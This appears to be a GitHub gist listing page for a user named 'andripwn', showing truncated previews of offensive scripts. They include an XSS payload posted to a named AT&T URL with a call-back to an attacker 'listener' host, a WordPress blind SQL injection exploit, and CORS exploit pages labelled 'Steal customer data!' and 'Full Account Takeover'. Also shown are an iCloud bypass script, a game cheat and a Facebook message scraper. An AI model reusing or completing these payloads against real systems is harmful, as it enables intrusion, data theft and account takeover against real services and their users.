This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| app.alert("XSS") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # CVEs: CVE-2016-6210 (Credits for this go to Andri Wahyudi) | |
| # | |
| # Author: 0_o -- null_null | |
| # server.0day [at] gmail.com | |
| # Oh, and it is n-u-one-one.n-u-one-one, no l's... | |
| # Wonder how the guys at packet storm could get this wrong :( | |
| # | |
| # Date: 2020-08-01 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = "https://onlinefaxtwo.att.com/loa.php" | |
| listener = input('Listener address. default port [80]: ') | |
| headers = {'Content-type': 'application/x-www-form-urlencoded'} | |
| data = {'uCompanyName': '<img src="http://' + listener + '">', | |
| 'uPersonAuth':'asas', |
andripwn
/ icloud-bypass.sh
Created
February 21, 2020 21:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # colors | |
| RED='\033[0;31m' | |
| GREEN='\033[0;32m' | |
| YELLOW='\033[0;33m' | |
| RESET='\033[0m' | |
| # install homebrew | |
| echo -e "[-] ${GREEN}install homebrew...${RESET}" |
andripwn
/ V5NoRecoil.lua
Last active
August 21, 2023 17:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ---------------- V5 ------------------------------ | |
| ---Updated on 7/19/19 | |
| ----Tutorial Videos------------------------------------------------ | |
| -----How to use: https://www.youtube.com/watch?v=F_tvWzF3x18 | |
| -----Youtube Channel: https://www.youtube.com/c/Kriptutorial |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(E_ALL); | |
| $norm_delay = 0; | |
| /////////////////////////////////////////////////////////////////////// | |
| /////////////////////////////////////////////////////////////////////// | |
| // WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit | |
| // written by Andri Wahyudi "Pwn0sec" | |
| // http://www.pwn0day.com/ | |
| // 27. June 2020 | |
| /////////////////////////////////////////////////////////////////////// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding=utf-8 | |
| import requests, re, threading, time | |
| from Exploits import printModule | |
| r = '\033[31m' | |
| g = '\033[32m' | |
| y = '\033[33m' | |
| b = '\033[34m' | |
| m = '\033[35m' | |
| c = '\033[36m' | |
| w = '\033[37m' |
andripwn
/ poccors.html
Last active
August 6, 2022 04:36
Cross Origin Resource Sharing Misconfiguration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <body> | |
| <center> | |
| <h3>Steal customer data!</h3> | |
| <html> | |
| <body> | |
| <button type='button' onclick='cors()'>Exploit</button> | |
| <p id='demo'></p> | |
| <script> |
andripwn
/ StealToken.html
Created
February 19, 2020 20:33
Full Account Takeover through CORS with connection Sockets
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head><title>Exploiting CORS</title></head> | |
| <body> | |
| <center> | |
| <h1>Getting your information through CORS</h1> | |
| <button type="button" onclick="ProcessUrls()">Exploit</button> | |
| </div> | |
| <script type="text/javascript"> | |
| var cont = 0; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script> | |
| <script type="text/javascript"> | |
| // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9 | |
| $(function(){ | |
| parse_messages = function() | |
| { | |
| $('.twoLines.preview>.snippet').each(function(index,value) | |
| { | |
| lines = value.innerHTML.replace(/(<([^>]+)>)/ig,''); |
NewerOlder